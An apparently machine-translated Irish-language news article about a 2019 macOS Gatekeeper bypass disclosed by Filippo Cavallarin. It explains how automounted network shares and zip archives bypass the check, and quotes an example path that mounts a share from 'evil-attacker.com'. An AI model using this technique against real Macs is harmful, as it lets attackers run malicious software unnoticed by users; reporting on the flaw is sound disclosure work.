Tá sé éasca aip mailíseach a shuiteáil ar Mac. Níor shocraigh Apple an earráid fiú tar éis trí mhí

27. 5. 2019

Chuir an taighdeoir slándála Filippo Cavallarin rabhadh faoin bhfabht i macOS 10.14.5 ar a bhlag. Is éard atá i gceist leis sin an fhéidearthacht bearta slándála Geataí a sheachbhóthar go hiomlán. De réir Cavallarin, léirigh sé an earráid do Apple cheana féin i mí Feabhra na bliana seo, ach níor shocraigh an chuideachta é sa nuashonrú is déanaí.

D'fhorbair Apple Gatekeeper agus ionchorpraíodh é ina chóras oibriúcháin deisce den chéad uair in 2012. Is meicníocht é a chuireann cosc ar fheidhmchlár a bheith ag rith gan eolas agus toiliú an úsáideora. Tar éis duit app a íoslódáil, seiceálann Gatekeeper a chód go huathoibríoch féachaint an bhfuil na bogearraí sínithe i gceart ag Apple.

Ina bhlagphost, tugann Cavallarin faoi deara go measann Gatekeeper, de réir réamhshocraithe, gur suíomhanna sábháilte iad scaireanna stórála seachtracha agus líonra. Dá bhrí sin is féidir aon fheidhmchlár a bhfuil na spriocanna seo ina chónaí air a sheoladh go huathoibríoch gan dul tríd an seic Geataí. Is í an ghné seo is féidir a shaothrú chun bogearraí mailíseacha a sheoladh i ngan fhios don úsáideoir.

Gné amháin a cheadaíonn rochtain neamhúdaraithe is ea an ghné uathfheistithe, a ligeann d’úsáideoirí sciar líonra a shuiteáil go huathoibríoch trí chonair a shonrú a thosaíonn le “/net/”. Mar shampla, luann Cavallarin an cosán "ls /net/evil-attacker.com/sharedfolder/" a d'fhéadfadh a bheith ina chúis leis an gcóras oibriúcháin inneachar fillteán "scairfhillteán" a luchtú in áit iargúlta a d'fhéadfadh a bheith mailíseach.

Is féidir leat féachaint ar an mbealach a oibríonn an bhagairt san fhíseán:

Fachtóir eile is ea an bhfíric má roinntear cartlann zip ina bhfuil nasc sonrach ar leith as a dtiocfaidh an fheidhm uathoibríoch, ní dhéanfaidh Geataí seiceáil air. Ar an mbealach seo, is féidir leis an íospartach an chartlann mailíseach a íoslódáil go héasca agus í a unzip, rud a ligeann don ionsaitheoir beagnach aon bhogearraí a rith ar an Mac i ngan fhios don úsáideoir. Tá a sciar den leochaileacht seo ag an Aimsitheoir, a fholaíonn síntí áirithe de réir réamhshocraithe.

Deir Cavallarin ar a bhlag gur tharraing Apple aird ar leochaileacht an chórais oibriúcháin macOS ar 22 Feabhra na bliana seo. Ach i lár mhí na Bealtaine, stop Apple ag cumarsáid le Cavallarin, agus mar sin chinn Cavallarin an rud ar fad a dhéanamh poiblí.

Foinse: FCVL

Ábhair: stórála, go huathoibríoch, MacOS, físeán, Socruithe, feidhm, úsáideoir, Iarratas, Apple

Plé ar an alt

Do ainm

Do thuairim

Trí na sonraí thuas a líonadh, admhaím go bhfuil an chuideachta TEXT FACTORY s.ro., oifig chláraithe i Brno, Durďákova 336/29, Černá Pole, ZIP cód: 613 00, uimhir aitheantais: 06157831, cláraithe ag an gCúirt Réigiúnach i Brno, alt C , cuir isteach 100399, próiseálfaidh sé mo shonraí pearsanta arna soláthar san fhoirm chlárúcháin arna líonadh agam ar bhonn leasanna dlisteanacha TEXT FACTORY sro de réir Airteagal 6 mír 1 litir f) GDPR agus chun oibleagáidí dlíthiúla a chomhlíonadh (Airteagal 6, mír 1, litir c) GDPR), chun na gcríoch seo a leanas: an gá atá le húdarú cuairteoirí chuig láithreáin ghréasáin arna n-oibriú ag TEXT FACTORY sro a áirithiú chun rannchuidiú go gníomhach le hailt foilsithe nó laistigh den phlé fóraim agus ag feidhmiú cearta TEXT FACTORY s.ro. mar riarthóir na bhfóram díospóireachta seo. Is féidir tuilleadh faisnéise faoi phróiseáil sonraí pearsanta agus cearta a fháil i Ceachtanna ar chosaint sonraí pearsanta. an téacs ar fad

D'fhéadfadh sé a bheith suim agat

Gaolmhar